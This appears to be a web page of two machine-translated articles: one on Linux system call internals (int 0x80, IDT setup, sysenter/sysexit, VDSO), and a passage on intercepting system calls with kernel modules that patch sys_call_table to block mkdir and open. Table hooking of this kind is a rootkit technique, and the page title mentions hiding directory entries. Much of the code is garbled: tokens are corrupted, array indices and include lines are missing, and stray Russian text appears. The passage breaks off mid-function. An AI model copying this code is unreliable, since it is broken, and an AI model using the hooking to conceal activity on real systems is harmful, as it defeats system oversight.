Linux - syscalls. System calls in Linux. System Calls Hiding a File Entry in a Directory

Much - said the Walrus - it's time to talk.
L. Carroll (Quoted from B. Stroustrap's book)

Instead of an introduction.

On the topic of the internal structure of the Linux kernel in general, its various subsystems and system calls in particular, it has already been written and rewritten in order. Probably, every self-respecting author should write about this at least once, just as every self-respecting programmer must write his own file manager :) Although I am not a professional IT writer, and in general, I make my notes solely for first of all, so as not to forget what you learned too quickly. But, if my travel notes are really useful to someone, of course, I will only be glad. Well, in general, you can't spoil the porridge with butter, so maybe even I will be able to write or describe something that no one bothered to mention.

Theory. What are system calls?

When they explain to the uninitiated what software (or OS) is, they usually say the following: the computer itself is a piece of hardware, but the software is what makes it possible to get some benefit from this piece of hardware. Rough, of course, but overall, somewhat true. I would probably say the same about the OS and system calls. In fact, in different operating systems, system calls can be implemented in different ways, the number of these same calls can differ, but one way or another, in one form or another there is a system call mechanism in any OS. Every day, a user explicitly or implicitly works with files. Of course, he can obviously open the file for editing in his favorite MS Word "e or Notepad" e, or he can simply launch a toy, the executable image of which, by the way, is also stored in a file, which, in turn, must open and read the loader executable files. In turn, the toy can also open and read dozens of files in the course of its work. Naturally, files can not only be read, but also written (not always, though, but here we are not talking about separation of rights and discrete access :)). All this is managed by the kernel (in microkernel operating systems, the situation may be different, but now we will unobtrusively lean towards the object of our discussion - Linux, so we will ignore this point). Spawning a new process itself is also a service provided by the OS kernel. All this is wonderful, as well as the fact that modern processors operate at gigahertz frequencies and consist of many millions of transistors, but what next? Yes, what if there was no mechanism by which user applications could perform some fairly mundane and, at the same time, necessary things ( in fact, in any case, these trivial actions are performed not by the user application, but by the OS kernel - ed.), then the OS was just a thing in itself - absolutely useless, or, on the contrary, each user application itself should have become an operating system in order to independently serve all its needs. Nice, isn't it?

Thus, we have come to the definition of a system call in the first approximation: a system call is a kind of service that the OS kernel provides to a user application at the request of the latter. Such a service can be the already mentioned file opening, its creation, reading, writing, creating a new process, getting the process identifier (pid), mounting file system, system shutdown finally. In real life, there are many more system calls than are listed here.

What does a system call look like and what is it? Well, from what was said above, it becomes clear that a system call is a kernel subroutine that has a corresponding appearance. Those who have experience programming under Win9x / DOS will probably remember the int 0x21 interrupt with all (or at least some) of its many functions. However, there is one small quirk that affects all Unix system calls. By convention, the function that implements the system call can take N arguments or not at all, but one way or another, the function must return an int value. Any non-negative value is interpreted as the successful execution of the system call function, and therefore the system call itself. A value less than zero is a sign of an error and at the same time contains an error code (error codes are defined in the include / asm-generic / errno-base.h and include / asm-generic / errno.h headers). In Linux, the gateway for system calls until recently was the int 0x80 interrupt, while in Windows (up to XP Service Pack 2, if I am not mistaken) such a gateway is the 0x2e interrupt. Again, in the Linux kernel, until recently, all system calls were handled by the system_call () function. However, as it turned out later, the classic mechanism for processing system calls through the 0x80 gateway leads to a significant drop in performance on Intel Pentium 4 processors. Therefore, the classical mechanism was replaced by the method of virtual dynamic shared objects (DSO - dynamic shared object file. I can not vouch for the correct translation, but DSO is what Windows users known as DLL - dynamically loaded and linkable library) - VDSO. What is the difference between the new method and the classical one? First, let's look at the classic method that works through the 0x80 gate.

The classic system call handling mechanism in Linux.

Interrupts in x86 architecture.

As mentioned above, gateway 0x80 (int 0x80) was previously used to serve user application requests. The operation of a system based on the IA-32 architecture is controlled by interrupts (strictly speaking, this applies in general to all systems based on x86). When an event occurs (a new timer tick, some activity on a device, errors - division by zero, etc.), an interrupt is generated. Interrupt is so named because it usually interrupts the normal flow of code. Interrupts are usually subdivided into hardware and software interrupts. Hardware interrupts are interrupts that are generated by system and peripheral devices. If there is a need for a device to attract the attention of the OS kernel, it (the device) generates a signal on its interrupt request line (IRQ - Interrupt ReQuest line). This leads to the fact that a corresponding signal is generated at certain processor inputs, on the basis of which the processor decides to interrupt the execution of the instruction stream and transfer control to the interrupt handler, which already finds out what happened and what needs to be done. Hardware interrupts are asynchronous in nature. This means that an interrupt can occur at any time. In addition to peripheral devices, the processor itself can generate interrupts (or, more precisely, hardware exceptions - for example, the already mentioned division by zero). This is done in order to notify the OS about the occurrence of an abnormal situation so that the OS can take some action in response to the occurrence of such a situation. After processing the interrupt, the processor returns to the execution of the interrupted program. An interrupt can be initiated by a custom application. This interrupt is called software interrupt. Software interrupts, unlike hardware interrupts, are synchronous. That is, when an interrupt is called, the code that called it is suspended until the interrupt is serviced. When exiting the interrupt handler, a return to the distant address stored earlier (when calling an interrupt) in the stack occurs, to the next instruction after the instruction calling the interrupt (int). An interrupt handler is a resident (resident in memory) piece of code. This is usually a small program. Although, if we are talking about the Linux kernel, then the interrupt handler there is not always that small. An interrupt handler is defined by a vector. A vector is nothing more than the address (segment and offset) of the beginning of the code that should handle interrupts with the given index. Working with interrupts differs significantly in Real Mode and Protected Mode of the processor (let me remind you that hereinafter we mean Intel processors and those compatible with them). In the real (unprotected) mode of the processor's operation, interrupt handlers are defined by their vectors, which are always stored at the beginning of the memory, the desired address is fetched from the vector table by the index, which is also the interrupt number. Having overwritten the vector with a certain index, you can assign your own handler to the interrupt.

In protected mode, interrupt handlers (gates, gates, or gates) are no longer defined using a vector table. Instead of this table, a gate table or, more correctly, an interrupt table - IDT (Interrupt Descriptors Table) is used. This table is formed by the kernel, and its address is stored in the processor's idtr register. This register is not directly accessible. It is only possible to work with it using the lidt / sidt instructions. The first of them (lidt) loads the value specified in the operand into the idtr register and is the base address of the interrupt descriptor table, the second (sidt) stores the address of the table located in idtr into the specified operand. In the same way as the selection of information about the segment from the descriptor table by the selector occurs, the selection of the segment descriptor serving the interrupt in the protected mode also occurs. Memory protection supported Intel processors starting with the CPU i80286 (not quite in the form in which it is presented now, if only because the 286 was a 16-bit processor - therefore Linux cannot work on these processors) and the i80386, and therefore the processor independently makes all the necessary samples and , therefore, we will not go deep into all the subtleties of protected mode (namely, Linux works in protected mode). Unfortunately, neither time nor opportunities allow us to dwell on the interrupt handling mechanism in protected mode for a long time. And that was not the goal when writing this article. All the information given here regarding the operation of the x86 family of processors is rather superficial and is provided only to help you a little better understand the mechanism of the kernel system calls. Something can be learned directly from the kernel code, although, for a complete understanding of what is happening, it is still advisable to familiarize yourself with the principles of protected mode. The piece of code that fills in the initial values (but does not set!) IDT is in arch / i386 / kernel / head.S: / * * setup_idt * * sets up a idt with 256 entries pointing to * ignore_int, interrupt gates. It doesn "t actually load * idt - that can be done only after paging has been enabled * and the kernel moved to PAGE_OFFSET. Interrupts * are enabled elsewhere, when we can be relatively * sure everything is ok. * * Warning:% esi is live across this function. * / 1.setup_idt: 2.lea ignore_int,% edx 3.movl $ (__ KERNEL_CS<< 16),%eax 4. movw %dx,%ax /* selector = 0x0010 = cs */ 5. movw $0x8E00,%dx /* interrupt gate - dpl=0, present */ 6. lea idt_table,%edi 7. mov $256,%ecx 8.rp_sidt: 9. movl %eax,(%edi) 10. movl %edx,4(%edi) 11. addl $8,%edi 12. dec %ecx 13. jne rp_sidt 14..macro set_early_handler handler,trapno 15. lea \handler,%edx 16. movl $(__KERNEL_CS << 16),%eax 17. movw %dx,%ax 18. movw $0x8E00,%dx /* interrupt gate - dpl=0, present */ 19. lea idt_table,%edi 20. movl %eax,8*\trapno(%edi) 21. movl %edx,8*\trapno+4(%edi) 22..endm 23. set_early_handler handler=early_divide_err,trapno=0 24. set_early_handler handler=early_illegal_opcode,trapno=6 25. set_early_handler handler=early_protection_fault,trapno=13 26. set_early_handler handler=early_page_fault,trapno=14 28. ret A few notes on the code: the given code is written in a kind of AT&T assembler, so your knowledge of assembler in its usual Intel notation can only be confusing. The most basic difference is in the order of the operands. If the order is defined for Intel notation - "accumulator"< "источник", то для ассемблера AT&T порядок прямой. Регистры процессора, как правило, должны иметь префикс "%", непосредственные значения (константы) префиксируются символом доллара "$". Синтаксис AT&T традиционно используется в Un*x-системах.

In the above example, lines 2-4 set the address of the default handler for all interrupts. The default handler is ignore_int, which does nothing. The presence of such a stub is necessary for the correct processing of all interrupts at this stage, since there are simply no others yet (however, traps are set a little lower in the code - see the Intel Architecture Manual Reference for traps or something similar, we will not be here touch the traps). Line 5 sets the valve type. On line 6, we load the address of our IDT table into the index register. The table should contain 255 entries, 8 bytes each. In lines 8-13, we fill the entire table with the same values set earlier in the eax and edx registers - that is, this is an interrupt gate referencing the ignore_int handler. Below we define a macro for setting traps - lines 14-22. In lines 23-26, using the above macro, we set traps for the following exceptions: early_divide_err - division by zero (0), early_illegal_opcode - unknown processor instruction (6), early_protection_fault - memory protection failure (13), early_page_fault - page translation failure (14) ... In parentheses are the numbers of "interrupts" generated when the corresponding abnormal situation occurs. Before checking the processor type in arch / i386 / kernel / head.S, the IDT is set by calling setup_idt: / * * start system 32-bit setup. We need to re-do some of the things done * in 16-bit mode for the "real" operations. * / 1.call setup_idt ... 2.call check_x87 3.lgdt early_gdt_descr 4.lidt idt_descr After finding out the type of (co) processor and performing all the preparatory steps in lines 3 and 4, we load the GDT and IDT tables, which will be used during the very first stages of the kernel.

System calls and int 0x80.

Let's go back from interrupts to system calls. So what does it take to service a process that requests a service? First, you need to move from ring 3 (CPL privilege level = 3) to the most privileged level 0 (Ring 0, CPL = 0), because the kernel code is located in the segment with the highest privileges. In addition, handler code is needed to service the process. This is exactly what the 0x80 gateway is used for. Although there are quite a few system calls, they all use a single entry point - int 0x80. The handler itself is installed when calling the arch / i386 / kernel / traps.c :: trap_init () function: void __init trap_init (void) (... set_system_gate (SYSCALL_VECTOR, & system_call); ...) We are most interested in this line in trap_init (). In the same file above, you can look at the code of the set_system_gate () function: static void __init set_system_gate (unsigned int n, void * addr) (_set_gate (n, DESCTYPE_TRAP | DESCTYPE_DPL3, addr, __KERNEL_CS);) Here you can see that the gate for interrupt 0x80 (namely, this value is defined by the SYSCALL_VECTOR macro - you can believe the word :)) is set as a trap with the DPL privilege level = 3 (Ring 3), i.e. this interrupt will be caught when called from user space. The problem with the transition from Ring 3 to Ring 0 thus. solved. The _set_gate () function is defined in the header file include / asm-i386 / desc.h. For those who are especially curious, below is the code, without lengthy explanations, however: static inline void _set_gate (int gate, unsigned int type, void * addr, unsigned short seg) (__u32 a, b; pack_gate (& a, & b, (unsigned long) addr, seg, type, 0); write_idt_entry (idt_table, gate , a, b);) Let's go back to the trap_init () function. It is called from the start_kernel () function in init / main.c. If you look at the trap_init () code, you can see that this function rewrites some of the IDT table values - the handlers that were used in the early stages of kernel initialization (early_page_fault, early_divide_err, early_illegal_opcode, early_protection_fault) are replaced with those that will be used already in the process work of the kernel. So, we almost got to the point and already know that all system calls are processed in the same way - through the int 0x80 gateway. The system_call () function is set as a handler for int 0x80, as you can see from the above piece of code arch / i386 / kernel / traps.c :: trap_init ().

system_call ().

The system_call () function code is located in arch / i386 / kernel / entry.S and looks like this: # system call handler stub ENTRY (system_call) RING0_INT_FRAME # can "t unwind into user space anyway pushl% eax # save orig_eax CFI_ADJUST_CFA_OFFSET 4 SAVE_ALL GET_THREAD_INFO (% ebp) # system call tracing in operation / emulation / number * Note, , and so it needs testw and not testb * / testw $ (_ TIF_SYSCALL_EMU | _TIF_SYSCALL_TRACE | _TIF_SECCOMP | _TIF_SYSCALL_AUDIT), TI_flags (% ebp) jnz syscall_trace_entry cmpl $ (nr_sallcall) 4) movl% eax, PT_EAX (% esp) # store the return value ... The code is not shown in full. As you can see, first system_call () sets up the stack to work in Ring 0, saves the value passed to it via eax on the stack, saves all registers also on the stack, gets data about the calling thread and checks if the passed value, the system call number, goes beyond syscall table limits, and then finally using the value passed to eax as an argument, system_call () navigates to the actual syscall handler based on which table entry is referenced by the index in eax. Now remember the good old real mode interrupt vector table. Doesn't it look like anything? In reality, of course, everything is somewhat more complicated. In particular, the system call must copy the results from the kernel stack to the user stack, pass the return code, and some other things. In the event that the argument specified in eax does not refer to an existing system call (the value is out of range), a jump to the syscall_badsys label occurs. Here, the -ENOSYS value is pushed onto the stack at the offset at which the eax value should be located - the system call is not implemented. This completes the execution of system_call ().

The system call table is located in the arch / i386 / kernel / syscall_table.S file and has a fairly simple form: ENTRY (sys_call_table) .long sys_restart_syscall / * 0 - old "setup ()" system call, used for restarting * / .long sys_exit .long sys_fork .long sys_read .long sys_write .long sys_open / * 5 * / .long sys_close sys_waitpid .long sys_creat ... In other words, the entire table is nothing more than an array of function addresses, arranged in the order of the system call numbers that these functions serve. The table is an ordinary array of double words (or 32-bit words - whichever you prefer). The code for some of the functions serving system calls is in the platform-dependent part - arch / i386 / kernel / sys_i386.c, and the platform-independent part is in kernel / sys.c.

This is the case with system calls and gate 0x80.

New mechanism for handling system calls in Linux. sysenter / sysexit.

As mentioned, it quickly became clear that using the traditional way of handling system calls based on the 0x80 gate leads to a performance loss on Intel Pentium 4 processors. Therefore, Linus Torvalds implemented a new mechanism in the kernel based on sysenter / sysexit instructions to improve kernel performance on machines equipped with a Pentium II processor or higher (it is with Pentium II + that Intel processors support the aforementioned sysenter / sysexit instructions). What is the essence of the new mechanism? Oddly enough, but the essence remains the same. The execution has changed. According to Intel documentation, the sysenter instruction is part of the "quick system calls" mechanism. In particular, this instruction is optimized for quickly moving from one privilege level to another. More precisely, it speeds up the transition to ring 0 (Ring 0, CPL = 0). In doing so, the operating system must prepare the processor to use the sysenter instruction. This setting is performed once when loading and initializing the OS kernel. When sysenter is called, it sets the processor registers according to the machine-dependent registers previously set by the OS. In particular, the segment register and instruction pointer register - cs: eip, as well as the stack segment and the top of the stack pointer - ss, esp are set. The transition to a new segment of the code and the shift is carried out from ring 3 to 0.

Sysexit does the opposite. It makes a quick transition from privilege level 0 to level 3 (CPL = 3). This sets the code segment register to 16 + the value of the cs segment stored in the machine-dependent register of the processor. The eip register contains the contents of the edx register. In ss, the sum of 24 and the values of cs are entered, which the OS previously entered into the machine-dependent register of the processor when preparing the context for the sysenter instruction to work. Esp stores the contents of the ecx register. The values required for the sysenter / sysexit instructions to work are stored at the following addresses:

SYSENTER_CS_MSR 0x174 - code segment, where the value of the segment is written, in which the system call handler code is located.
SYSENTER_ESP_MSR 0x175 - pointer to the top of the stack for the system call handler.
SYSENTER_EIP_MSR 0x176 - a pointer to an offset within the code segment. Indicates the start of the system call handler code.

These addresses refer to model-dependent registers that have no names. Values are written to model-dependent registers using the wrmsr instruction, while edx: eax must contain the upper and lower parts of the 64-bit machine word, respectively, and the address of the register into which the write will be made must be entered in ecx. In Linux, the addresses of model-dependent registers are defined in the include / asm-i368 / msr-index.h header file as follows (before version 2.6.22, at least they were defined in the include / asm-i386 / msr.h header file, let me remind you that we consider the system calls mechanism using the example of the Linux 2.6.22 kernel): #define MSR_IA32_SYSENTER_CS 0x00000174 #define MSR_IA32_SYSENTER_ESP 0x00000175 #define MSR_IA32_SYSENTER_EIP 0x00000176 The kernel code responsible for setting model-dependent registers is located in arch / i386 / sysenter.c and looks like this: 1.void enable_sep_cpu (void) (2.int cpu = get_cpu (); 3.struct tss_struct * tss = & per_cpu (init_tss, cpu); 4.if (! Boot_cpu_has (X86_FEATURE_SEP)) (5.put_cpu (); 6. return;) 7.tss-> x86_tss.ss1 = __KERNEL_CS; 8.tss-> x86_tss.esp1 = sizeof (struct tss_struct) + (unsigned long) tss; 9.wrmsr (MSR_IA32_SYSENTER_CS, __KERNEL_ wCrms, 0); 10. MSR_IA32_SYSENTER_ESP, tss-> x86_tss.esp1, 0); 11.wrmsr (MSR_IA32_SYSENTER_EIP, (unsigned long) sysenter_entry, 0); 12.put_cpu ();) Here in the tss variable we get the address of the structure that describes the segment of the task state. TSS (Task State Segment) is used to describe the context of a task and is part of the hardware multitasking mechanism for the x86 architecture. However, Linux practically does not use hardware task context switching. According to Intel documentation, switching to another task is done either by executing an intersegment jump instruction (jmp or call) that refers to the TSS segment, or to the task gate descriptor in the GDT (LDT). A special processor register invisible to the programmer - TR (Task Register) contains a task descriptor selector. Loading this register also loads the program-invisible base and limit registers associated with TR.

Although Linux does not use hardware task context switching, the kernel is forced to set aside a TSS entry for each processor installed on the system. This is because when the processor switches from user mode to kernel mode, it fetches the kernel stack address from the TSS. In addition, TSS is required to control access to I / O ports. TSS contains a map of access rights to ports. Based on this map, it becomes possible to control port access for each process using in / out instructions. Here tss-> x86_tss.esp1 points to the kernel stack. __KERNEL_CS naturally points to a segment of kernel code. The address of the sysenter_entry () function is specified as the offset-eip.

The sysenter_entry () function is defined in arch / i386 / kernel / entry.S and looks like this: / * SYSENTER_RETURN points to after the "sysenter" instruction in the vsyscall page. See vsyscall-sysentry.S, which defines the symbol. * / # sysenter call handler stub ENTRY (sysenter_entry) CFI_STARTPROC simple CFI_SIGNAL_FRAME CFI_DEF_CFA esp, 0 CFI_REGISTER esp, ebp movl TSS_sysenter_esp0 (% esp),% esp sysenter_past * No need sysp: / sectioncall disabled irqs and here we enable it straight after entry: * / ENABLE_INTERRUPTS (CLBR_NONE) pushl $ (__ USER_DS) CFI_ADJUST_CFA_OFFSET 4 / * CFI_REL_OFFSET ss, 0 * / pushl% ebp CFI_ADJUST_CFA_OFFSET 4 CFI_REL_OFFSET esp, 0 pushfl CFI_ADJUST_CFA_OFFSET 4 pushl $ (__ USER_CS) CFI_ADJUST_CFA_OFFSET 4 / * CFI_REL_OFFSET cs, 0 * / / * * Push current_thread_info () -> sysenter_return to the stack. * A tiny bit of offset fixup is necessary - 4 * 4 means the 4 words * pushed above; +8 corresponds to copy_thread "s esp0 setting. * / Pushl (TI_sysenter_return-THREAD_SIZE + 8 + 4 * 4) (% esp) CFI_ADJUST_CFA_OFFSET 4 CFI_REL_OFFSET eip, 0 / * * Load the potential sixth argument from user stack. * Careful about security . * / cmpl $ __ PAGE_OFFSET-3,% ebp jae syscall_fault 1: movl (% ebp),% ebp .section __ex_table, "a" .align 4 .long 1b, syscall_fault .previous pushl% eax CFI_ADJUST_CFAVEFFSET ) / * Note, _TIF_SECCOMP is bit number 8, and so it needs testw and not testb * / testw $ (_ TIF_SYSCALL_EMU | _TIF_SYSCALL_TRACE | _TIF_SECCOMP | _TIF_SYSCALL_AUDIT), TI_flags, TI_flags (% jys_calls_calls_call) call * sys_call_table (,% eax, 4) movl% eax, PT_EAX (% esp) DISABLE_INTERRUPTS (CLBR_ANY) TRACE_IRQS_OFF movl TI_flags (% ebp),% ecx testw $ _TIF_ALLWORK_MASK,% cx_existers modysit ss disable sysexit * / movl PT_EIP (% esp),% edx movl PT_OLDESP (% esp),% ecx xorl% ebp,% ebp TRACE_IRQS_ON 1: mov PT_FS (% esp),% fs ENABLE_INTERRUPTS_SYSEXIT CFI_ENDPROC .pushsection .fixup, "ax" 2: movl $ 0, PT_FS (% esp) jmp 1b .section __exal_table 4. "a". 1b, 2b .popsection ENDPROC (sysenter_entry) As with system_call (), most of the work is done in the call * sys_call_table (,% eax, 4) line. This is where the specific system call handler is called. So, it is clear that little has fundamentally changed. The fact that the interrupt vector is now hammered into hardware and the processor helps us to move from one privilege level to another faster changes only some of the execution details with the same content. However, the changes do not end there. Remember where the story began. At the very beginning, I mentioned already about virtual shared objects. So, if earlier the implementation of a system call, say, from the system library libc looked like an interrupt call (despite the fact that the library took over some functions to reduce the number of context switches), now thanks to VDSO the system call can be made almost directly , without libc. It could have previously been implemented directly, again, as an interrupt. But now the call can be requested like a normal function exported from a dynamically linked library (DSO). At boot time, the kernel determines which mechanism should and can be used for a given platform. Depending on the circumstances, the kernel sets an entry point to the function making the system call. Next, the function is exported to user space as the linux-gate.so.1 library. The linux-gate.so.1 library does not physically exist on disk. It, so to speak, is emulated by the kernel and exists exactly as long as the system is running. If you shutdown the system, mount the root FS from another system, then you will not find this file on the root FS of the stopped system. Actually, you won't be able to find it even on a running system. Physically, it simply does not exist. That is why linux-gate.so.1 is something other than VDSO - i.e. Virtual Dynamically Shared Object. The kernel maps the dynamically emulated dynamic library to the address space of each process. You can easily verify this if you run the following command: [email protected]: ~ $ cat / proc / self / maps 08048000-0804c000 r-xp 00000000 08:01 46 / bin / cat 0804c000-0804d000 rw-p 00003000 08:01 46 / bin / cat 0804d000-0806e000 rw-p 0804d000 00:00 0 ... b7fdf000-b7fe1000 rw-p 00019000 08:01 2066 /lib/ld-2.5.so bffd2000-bffe8000 rw-p bffd2000 00:00 0 ffffe000-fffff000 r-xp 00000000 00:00 0 Here the very last line is the object of interest to us: ffffe000-fffff000 r-xp 00000000 00:00 0 From the given example, it can be seen that the object occupies exactly one page in memory - 4096 bytes, practically on the outskirts of the address space. Let's do one more experiment: [email protected]: ~ $ ldd `which cat` linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e87000) / lib / ld-linux .so.2 (0xb7fdf000) [email protected]: ~ $ ldd `which gcc` linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e3c000) / lib / ld-linux .so.2 (0xb7f94000) [email protected]:~$ Here we just took two applications offhand. It can be seen that the library is mapped to the process address space at the same constant address - 0xffffe000. Now let's try to see what is actually stored on this memory page ...

You can dump the memory page where the shared VDSO code is stored using the following program: #include #include #include int main () (char * vdso = 0xffffe000; char * buffer; FILE * f; buffer = malloc (4096); if (! buffer) exit (1); memcpy (buffer, vdso, 4096) ; if (! (f = fopen ("test.dump", "w + b"))) (free (buffer); exit (1);) fwrite (buffer, 4096, 1, f); fclose (f) ; free (buffer); return 0;) Strictly speaking, earlier this could be done easier using the command dd if = / proc / self / mem of = test.dump bs = 4096 skip = 1048574 count = 1, but kernels since version 2.6.22, or perhaps even earlier, no longer map process memory to / proc / `pid` / mem. This file has been saved, obviously for compatibility purposes, but does not contain more information.

Let's compile and run the given program. Let's try to disassemble the resulting code: [email protected]: ~ / tmp $ objdump --disassemble ./test.dump ./test.dump: file format elf32-i386 Disassembly of section .text: ffffe400<__kernel_vsyscall>: ffffe400: 51 push% ecx ffffe401: 52 push% edx ffffe402: 55 push% ebp ffffe403: 89 e5 mov% esp,% ebp ffffe405: 0f 34 sysenter ... ffffe40e: eb f3 jmp ffffe403<__kernel_vsyscall+0x3>ffffe410: 5d pop% ebp ffffe411: 5a pop% edx ffffe412: 59 pop% ecx ffffe413: c3 ret ... [email protected]: ~ / tmp $ Here it is our gateway for system calls, all at a glance. The process (or the system library libc), calling the __kernel_vsyscall function, gets to the address 0xffffe400 (in our case). Further, __kernel_vsyscall saves the contents of the ecx, edx, ebp registers on the stack of the user process. We already spoke about the purpose of the ecx and edx registers earlier, in ebp it is used later to restore the user stack. The instruction sysenter is executed, "interrupt interception" and, as a consequence, the next transition to sysenter_entry (see above). The jmp instruction at 0xffffe40e is inserted to restart the system call with 6 arguments (see http://lkml.org/lkml/2002/12/18/). The code placed on the page is located in arch / i386 / kernel / vsyscall-enter.S (or arch / i386 / kernel / vsyscall-int80.S for the 0x80 trap). Although I found that the address of the __kernel_vsyscall function is constant, it is believed that this is not the case. Typically, the position of the entry point to __kernel_vsyscall () can be found from the ELF-auxv vector using the AT_SYSINFO parameter. The ELF-auxv vector contains information passed to the process through the stack at startup and contains various information needed during the program's execution. This vector contains, in particular, the environment variables of the process, arguments, etc.

Here is a small C example of how you can access the __kernel_vsyscall function directly: #include int pid; int main () (__asm ("movl $ 20,% eax \ n" "call *% gs: 0x10 \ n" "movl% eax, pid \ n"); printf ("pid:% d \ n", pid) ; return 0;) This example is taken from the Manu Garg page, http://www.manugarg.com. So, in the above example, we make the getpid () system call (number 20 or otherwise __NR_getpid). In order not to climb the process stack in search of the AT_SYSINFO variable, we will take advantage of the fact that the libc.so system library at boot copies the value of the AT_SYSINFO variable into the Thread Control Block (TCB). This block of information is usually referenced by a selector in gs. We assume that the desired parameter is located at offset 0x10 and make a call to the address stored in% gs: $ 0x10.

Results.

In fact, in practice, it is not always possible to achieve a special performance gain even with the support of the FSCF (Fast System Call Facility) on this platform. The problem is that one way or another, a process rarely speaks directly to the kernel. And there are good reasons for this. Using the libc library allows you to guarantee the portability of the program, regardless of the kernel version. And it is through the standard system library that most of the system calls go. Even if you build and install the latest kernel built for a platform that supports FSCF, this is not a guarantee of performance gain. The point is that your system library libc.so will still use int 0x80 and can only be dealt with by rebuilding glibc. Does glibc support the VDSO interface and __kernel_vsyscall at all, I honestly admit on this moment I am at a loss to answer.

Links.

Manu Garg "s page, http://www.manugarg.com
Scatter / Gather thoughts by Johan Petersson, http://www.trilithium.com/johan/2005/08/linux-gate/
Good old Understanding the Linux kernel Where can we go without it :)
And of course, the Linux source code (2.6.22)

VLADIMIR MESHKOV

Intercepting system calls in Linux

In recent years, the Linux operating system has firmly established itself as the leading server platform, ahead of many commercial developments. Still protection issues information systems based on this OS do not cease to be relevant. There are many technical means, both software and hardware, which allow you to ensure the security of the system. These are means of encrypting data and network traffic, differentiating access rights to information resources, protection Email, web servers, antivirus protection, etc. The list, as you know, is quite long. In this article, we suggest that you consider a protection mechanism based on intercepting system calls of the operating Linux systems... This mechanism allows you to take control of the work of any application and thereby prevent possible destructive actions that it can perform.

System calls

Let's start with the definition. System calls are a collection of functions implemented in the kernel of the OS. Any request from the user's application is ultimately transformed into a system call that performs the requested action. A complete list of Linux system calls can be found in the /usr/include/asm/unistd.h file. Let's take a look at the general mechanism for making system calls with an example. Let the creat () function be called in the source code of the application to create a new file. When the compiler encounters a call to this function, it converts it into assembly code, ensuring that the system call number corresponding to this function and its parameters are loaded into the processor registers and the subsequent call to interrupt 0x80. The following values are loaded into processor registers:

to register EAX- system call number. So, for our case, the system call number will be 8 (see __NR_creat);
to EBX register- the first parameter of the function (for creat, this is a pointer to a string containing the name of the file to be created);
to ECX register- the second parameter (file access rights).

The third parameter is loaded into the EDX register, in this case we do not have it. To execute a system call on Linux, the system_call function is used, which is defined in the /usr/src/liux/arch/i386/kernel/entry.S file. This function is the entry point for all system calls. The kernel responds to interrupt 0x80 by calling the system_call function, which is, in fact, a handler for interrupt 0x80.

To make sure we're on the right track, let's write a small test snippet in assembler. Here we will see what the creat () function becomes after compilation. Let's name the file test.S. Here is its content:

Globl _start

Text

Start:

Load the system call number into the EAX register:

movl $ 8,% eax

The EBX register is the first parameter, a pointer to a string with the file name:

movl $ filename,% ebx

In the ECX register - the second parameter, access rights:

movl $ 0,% ecx

Calling the interrupt:

int $ 0x80

We exit the program. To do this, call the exit (0) function:

movl $ 1,% eax movl $ 0,% ebx int $ 0x80

In the data segment, specify the name of the file to be created:

Data

filename: .string "file.txt"

Compile:

gcc -c test.S

ld -s -o test test.o

The current directory will show executable file test. By running it, we will create a new file called file.txt.

Now let's get back to looking at the system calls mechanism. So, the kernel calls the 0x80 interrupt handler - the system_call function. System_call pushes copies of the registers containing the call parameters onto the stack using the SAVE_ALL macro and calls the required system function with the call command. The table of pointers to kernel functions that implement system calls is located in the sys_call_table array (see file arch / i386 / kernel / entry.S). The system call number, which is in the EAX register, is an index in this array. Thus, if EAX contains a value of 8, the kernel sys_creat () function will be called. Why is the SAVE_ALL macro needed? The explanation is very simple. Since almost all system kernel functions are written in C, they look for their parameters in the stack. And the parameters are pushed onto the stack using the SAVE_ALL macro! The value returned by the system call is stored in the EAX register.

Now let's figure out how to intercept the system call. The mechanism of loadable kernel modules will help us with this. Although we have previously discussed the development and use of kernel modules, in the interests of consistency, we will briefly discuss what a kernel module is, what it consists of, and how it interacts with the system.

Loadable kernel module

A loadable kernel module (let's call it LKM - Loadable Kernel Module) is program code that runs in kernel space. Main feature LKM is the ability to dynamically load and unload without having to reboot the entire system or recompile the kernel.

Each LKM consists of two main functions (minimum):

module initialization function. Called when the LKM is loaded into memory:

int init_module (void) (...)

module unload function:

void cleanup_module (void) (...)

Let's give an example of the simplest module:

#define MODULE

#include

int init_module (void)

printk ("Hello World");

return 0;

void cleanup_module (void)

printk ("Bye");

Compile and load the module. The module is loaded into memory by the insmod command:

gcc -c -O3 helloworld.c

insmod helloworld.o

Information about all modules currently loaded into the system is located in the / proc / modules file. To make sure the module is loaded, enter cat / proc / modules or lsmod. The rmmod command unloads the module:

rmmod helloworld

System call interception algorithm

To implement a module that intercepts a system call, it is necessary to define an interception algorithm. The algorithm is as follows:

save a pointer to the original (original) call to be able to restore it;
create a function that implements a new system call;
replace the calls in the sys_call_table system calls table, i.e. set up an appropriate pointer to a new system call;
upon completion of work (when unloading the module), restore the original system call using the previously saved pointer.

You can use tracing to figure out which system calls are involved in a user's application. By tracing, you can determine which system call should be intercepted to take control of the application. An example of using the tracing program will be discussed below.

Now we have enough information to start examining examples of implementing modules that intercept system calls.

Examples of intercepting system calls

Preventing the creation of directories

When the directory is created, the sys_mkdir kernel function is called. The parameter is a string that contains the name of the created directory. Consider the code that intercepts the corresponding system call.

#include

We export the system call table:

extern void * sys_call_table;

Let's define a pointer to store the original system call:

int (* orig_mkdir) (const char * path);

Let's create our own system call. Our call does nothing, it just returns a null value:

int own_mkdir (const char * path)

return 0;

During module initialization, we save the pointer to the original call and replace the system call:

int init_module ()

orig_mkdir = sys_call_table;

sys_call_table = own_mkdir; return 0;

When unloading, we restore the original call:

void cleanup_module ()

Sys_call_table = orig_mkdir;

Save the code in the sys_mkdir_call.c file. To get the object module, let's create a Makefile with the following content:

CC = gcc

CFLAGS = -O3 -Wall -fomit-frame-pointer

sys_mkdir_call.o: sys_mkdir_call.c

$ (CC) -c $ (CFLAGS) $ (MODFLAGS) sys_mkdir_call.c

Use the make command to create a kernel module. After downloading it, let's try to create a directory with the mkdir command. As you can see, nothing happens. The command doesn't work. To restore its operability, it is enough to unload the module.

Prevent reading the file

In order to read a file, you must first open it with open functions... It is easy to guess that this function corresponds to the sys_open system call. By intercepting it, we can protect the file from reading. Let's consider the implementation of the interceptor module.

#include

extern void * sys_call_table;

Pointer to keep the original system call:

int (* orig_open) (const char * pathname, int flag, int mode);

The first parameter to the open function is the name of the file to open. A new system call should compare this parameter with the name of the file we want to protect. If the names match, a file opening error will be simulated. Our new system call looks like this:

int own_open (const char * pathname, int flag, int mode)

